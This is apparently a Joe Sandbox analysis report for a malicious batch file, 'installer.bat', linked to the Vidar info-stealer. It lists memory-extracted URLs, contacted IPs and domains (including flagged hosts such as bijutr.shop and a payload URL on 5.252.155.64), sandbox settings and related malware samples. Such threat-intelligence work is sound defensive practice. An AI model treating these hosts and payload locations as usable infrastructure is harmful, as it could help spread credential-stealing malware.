http://anglebug.com/4836	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000018.00000002.2723515837.000054DC00650000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/installwebapp?usp=chrome_defaultT	chrome.exe, 00000018.00000002.2732200140.000054DC01048000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bijutr.shop/URR	Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://anglebug.com/3970	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Iceland.com, 00000015.00000002.3347506907.0000000006B87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://labs.google.com/search?source=ntp	chrome.exe, 00000018.00000002.2722915743.000054DC0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2631714426.00002EA80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2677340926.00002EA800974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.go	chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/?usp=installed_webappapp	chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5901	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/update2/response	chrome.exe, 00000018.00000003.2675147350.000054DC02294000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 00000003.00000002.2106520526.000001A50162F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/MergeSession	msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/oglT	chrome.exe, 00000018.00000002.2723861274.000054DC00708000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 00000019.00000003.2634995492.000002891D223000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.25.dr, edb.log.25.dr	false		high
https://lens.google.com/v3/upload	chrome.exe, 00000018.00000003.2632475644.00002EA80087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2721017519.00002EA800920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3832	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 00000018.00000003.2665397193.000054DC00ED4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-0.corp.google.com/	chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	false		high
https://permanently-removed.invalid/Logout	msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/upload	chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/?usp=installed_webapp	chrome.exe, 00000018.00000002.2733200663.000054DC01188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725233523.000054DC00997000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bijutr.shopsh;	Iceland.com, 00000015.00000002.3341880599.000000000436C000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chromewebstore.google.com/https://chrome.google.com/webstoreF	msedge.exe, 00000020.00000002.2899806093.0000469C0017C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6651	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/4830	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/:	chrome.exe, 00000018.00000002.2724063973.000054DC00729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2729877275.000054DC00DB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/	chrome.exe, 00000018.00000002.2729196399.000054DC00CF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000019.00000003.2634995492.000002891D1B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.25.dr, edb.log.25.dr	false		high
https://myaccount.google.com/shielded-email2B	chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bijutr.shopbf8eaf1819b7	Iceland.com, 00000015.00000002.3341880599.00000000043CD000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Tracking.11.dr, Iceland.com.12.dr	false		high
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000018.00000002.2723098696.000054DC00514000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2162	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5430	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/LogoutYxABzen	msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.44.201.37	unknown	United States	20940	AKAMAI-ASN1EU	false
18.165.220.106	sb.scorecardresearch.com	United States	3	MIT-GATEWAYSUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
5.252.155.64	unknown	Russian Federation	49981	WORLDSTREAMNL	true
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
188.245.216.205	bijutr.shop	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.181.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
108.139.47.108	unknown	United States	16509	AMAZON-02US	false
23.209.72.7	unknown	United States	20940	AKAMAI-ASN1EU	false
20.42.73.30	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581177
Start date and time:	2024-12-27 07:08:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	installer.bat
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winBAT@120/321@25/17
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 77 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.21.35, 64.233.161.84, 172.217.19.238, 172.217.17.46, 23.218.208.109, 142.250.181.99, 172.217.21.42, 172.217.19.170, 172.217.19.202, 142.250.181.10, 142.250.181.42, 172.217.17.74, 142.250.181.106, 142.250.181.138, 172.217.17.42, 142.250.181.74, 172.217.19.234, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 13.87.96.169, 2.19.198.56, 23.32.238.138, 2.16.158.171, 2.16.158.82, 2.16.158.169, 2.16.158.90, 2.16.158.80, 2.16.158.83, 2.16.158.170, 2.16.158.185, 2.16.158.176, 2.16.158.74, 2.16.158.75, 2.16.168.113, 2.16.168.122, 95.100.135.185, 95.100.135.201, 95.100.135.178, 95.100.135.202, 95.100.135.176, 95.100.135.192, 95.100.135.177, 95.100.135.195, 95.100.135.187, 204.79.197.237, 13.107.21.237, 13.74.129.1, 142.251.40.227, 142.250.80.67, 142.251.35.163, 142.251.40.195, 142.251.40.163, 142.250.64.99, 142.250.81.227, 13.107.246.63, 4.245.163.56, 94.245.104.56, 20.231.128.67, 23.200.0.6, 4.152.199.46, 13.107.
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, redirecto
Execution Graph export aborted for target powershell.exe, PID 3168 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:09:01	API Interceptor	74x Sleep call for process: powershell.exe modified
01:09:19	API Interceptor	1x Sleep call for process: yoda.exe modified
01:09:56	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.44.201.37	file.exe	Get hash	malicious	Unknown	Browse
18.165.220.106	https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01	Get hash	malicious	Unknown	Browse
	https://ammyy.com/en/downloads.html	Get hash	malicious	Flawedammyy	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
5.252.155.64	script.ps1	Get hash	malicious	Vidar	Browse	5.252.155.64/lem.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	yoda.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	script.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
bijutr.shop	yoda.exe	Get hash	malicious	Vidar	Browse	188.245.216.205
	lem.exe	Get hash	malicious	Vidar	Browse	188.245.216.205
	script.ps1	Get hash	malicious	Vidar	Browse	188.245.216.205
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	188.245.216.205
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	188.245.216.205
chrome.cloudflare-dns.com	lem.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	WRD1792.docx.doc	Get hash	malicious	Dynamer	Browse	162.159.61.3
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	https://jkqbjwq.maxiite.com	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	SalmonSamurai.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SalmonSamurai.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://liladelman.com/rental/1218-west-side-road-block-island/	Get hash	malicious	Unknown	Browse	162.159.61.3
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	lem.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	94.245.104.56
	gVKsiQIHqe.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	94.245.104.56
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	pjthjsdjgjrtavv.exe	Get hash	malicious	Vidar	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	yoda.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	script.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse	149.154.167.220
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	149.154.167.220
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
